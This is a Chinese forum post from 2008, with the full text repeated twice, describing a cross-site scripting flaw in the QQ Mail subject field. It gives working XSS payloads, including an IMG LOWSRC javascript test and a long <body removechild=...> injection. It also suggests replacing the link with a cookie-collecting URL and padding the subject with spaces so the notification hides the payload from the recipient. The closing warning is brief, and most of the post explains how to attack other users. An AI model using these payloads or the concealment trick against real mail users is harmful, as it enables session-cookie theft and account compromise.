小心你的QQ邮箱 QQ邮箱暴跨站漏洞

我☆能 · 发表于 2008-4-6 16:30

笔者最近在使用QQ邮箱的时候，发现QQ邮箱的文本编辑器支持HTML格式编辑邮件，但是一些容易引发跨站的标签属性，都已经过滤掉。测试邮件标题的时候发现一个很有趣的小漏洞，这个跨站引发在发邮件的时候和回复邮件的时候。所以也是可能被利用的。
所有的跨站代码，这里都支持。以这个为例，测试一下。<IMG LOWSRC=\"javascript:alert('XSS')\">

登录/注册后可看大图

图1

填写好后，点击“填写好后，点击“发送”，出现如下提示：

登录/注册后可看大图

点击“确定”返回邮件发送成功的页面。

登录/注册后可看大图

图3

  我想到了，可能被利用的一点。
  那就是用如下这句：
  <body/\" removechild=\"function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute(\"removeChild\");var result = self[\"removeChild\"](arg1);self[\"removeChild\"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}\">http://baidu.com\")'>
  发送的时候回弹出一个页面。活着换成接受COOKIE的链接。这个对方回复你邮件的时候会弹出一个页面，中马，或者COOKIE被截取。把<body/\" removechild=\"function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute(\"removeChild\");var result = self[\"removeChild\"](arg1);self[\"removeChild\"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}\">http://baidu.com\")'>中间的部分UNIONCODE编码得到：
<body >
  这样的迷惑就大一些了。而QQ邮件的标题似乎没做长度很大。所以可以像下面那样填写标题。

登录/注册后可看大图

图4

中间加上许多空格。这样在QQ右下角提示来新邮件的时候，就不会显示后面的编码部分。只显示空格前面的标题。如果你的内容比较具有迷惑性，当对方甚至不更改标题，直接回复你的时候就引发跨站了。当然对方用的是必须是QQ邮箱，别的邮箱也许也会有这样的跨站漏洞。这只是一个简单的利用，或许有更特别的方式。本文到此结束，也提醒大家注意防范此类风险。

我☆能 · 发表于 2008-4-6 16:30

笔者最近在使用QQ邮箱的时候，发现QQ邮箱的文本编辑器支持HTML格式编辑邮件，但是一些容易引发跨站的标签属性，都已经过滤掉。测试邮件标题的时候发现一个很有趣的小漏洞，这个跨站引发在发邮件的时候和回复邮件的时候。所以也是可能被利用的。
所有的跨站代码，这里都支持。以这个为例，测试一下。<IMG LOWSRC=\"javascript:alert('XSS')\">

登录/注册后可看大图

图1

填写好后，点击“填写好后，点击“发送”，出现如下提示：

登录/注册后可看大图

点击“确定”返回邮件发送成功的页面。

登录/注册后可看大图

图3

  我想到了，可能被利用的一点。
  那就是用如下这句：
  <body/\" removechild=\"function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute(\"removeChild\");var result = self[\"removeChild\"](arg1);self[\"removeChild\"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}\">http://baidu.com\")'>
  发送的时候回弹出一个页面。活着换成接受COOKIE的链接。这个对方回复你邮件的时候会弹出一个页面，中马，或者COOKIE被截取。把<body/\" removechild=\"function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute(\"removeChild\");var result = self[\"removeChild\"](arg1);self[\"removeChild\"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}\">http://baidu.com\")'>中间的部分UNIONCODE编码得到：
<body >
  这样的迷惑就大一些了。而QQ邮件的标题似乎没做长度很大。所以可以像下面那样填写标题。

登录/注册后可看大图

图4

中间加上许多空格。这样在QQ右下角提示来新邮件的时候，就不会显示后面的编码部分。只显示空格前面的标题。如果你的内容比较具有迷惑性，当对方甚至不更改标题，直接回复你的时候就引发跨站了。当然对方用的是必须是QQ邮箱，别的邮箱也许也会有这样的跨站漏洞。这只是一个简单的利用，或许有更特别的方式。本文到此结束，也提醒大家注意防范此类风险。